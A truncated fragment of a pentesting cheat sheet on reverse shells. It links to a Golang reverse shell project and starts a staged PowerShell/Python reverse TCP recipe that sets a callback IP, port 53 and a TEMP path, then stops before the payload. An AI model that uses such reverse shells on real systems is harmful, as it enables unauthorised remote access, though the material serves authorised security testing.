###### Shells ###### ******* Generic ******* Golang Windows & Linux reverse shell ************************************ | https://gitlab.com/charles.gargasson/gobhack | ******* Windows ******* PowerShell Python Reverse TCP (web stagged) ******************************************* | You need embeddable python zip at https://www.python.org/downloads/windows/ and to serve it as python.zip .. code-block:: bash IP="192.168.1.163" PORT=53 PROCESS="powershell.exe" WRITABLEPATH='$env:TEMP' cat <